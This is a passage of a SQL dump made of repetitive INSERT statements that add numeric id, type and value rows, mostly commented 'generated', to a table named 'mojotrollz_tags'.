`type`, `value`, `comment`) VALUES (6648, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6649, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6649, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6650, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6650, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6651, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6651, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6652, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6652, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6653, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6653, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6666, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6667, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6668, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6668, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6669, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6669, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6670, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6670, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6706, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6706, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6707, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6707, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6726, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6726, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6727, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6728, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6728, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6729, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6729, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6729, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6730, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6730, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6731, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6731, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6732, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6732, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6733, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6733, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6734, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6734, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6735, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6735, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6736, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6737, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6738, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6739, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6740, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6740, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6741, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6741, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6741, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6741, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6741, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6746, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6746, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6747, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6747, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6748, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6749, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6749, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6766, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6766, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6768, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6768, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6771, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6771, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6774, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6774, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6775, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6775, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6776, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6776, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6777, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6777, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6778, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6779, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6779, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6780, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6780, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6781, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6782, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6782, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6784, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6785, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6785, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6786, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6786, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6786, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6787, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6787, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6787, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6787, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6787, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6788, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6788, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6789, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6789, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6790, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6790, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6791, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6791, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6791, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6791, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6791, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6806, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6806, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6807, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6807, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6826, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6826, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6846, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6846, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6866, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6867, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6868, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6868, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6886, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6886, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6887, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6887, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6906, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6906, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6906, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6907, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6907, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6907, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6908, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6908, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6908, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6909, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6909, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6910, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6910, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6910, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6911, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6912, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6912, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6912, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6913, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6927, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6927, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6928, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6928, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6928, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6928, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6928, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6928, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6929, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6929, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6929, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6929, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6929, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6929, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6930, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6930, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6932, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6946, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6946, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6966, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6966, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6986, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6986, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6986, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6986, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6986, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6986, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6987, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6987, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6987, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6987, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6987, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6987, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7007, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7007, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7009, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7009, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7010, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7010, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7010, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7010, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7010, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7010, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7011, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7011, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7011, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7012, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7012, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7012, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7015, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7015, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7016, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7016, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7017, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7017, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7022, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7022, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7022, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7023, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7023, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7023, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7024, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7024, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7025, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7025, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7026, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7026, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7027, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7027, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7028, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7028, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7029, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7029, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7030, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7030, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7030, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7031, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7031, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7032, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7032, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7033, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7033, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7034, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7034, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7035, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7035, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7036, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7036, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7037, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, 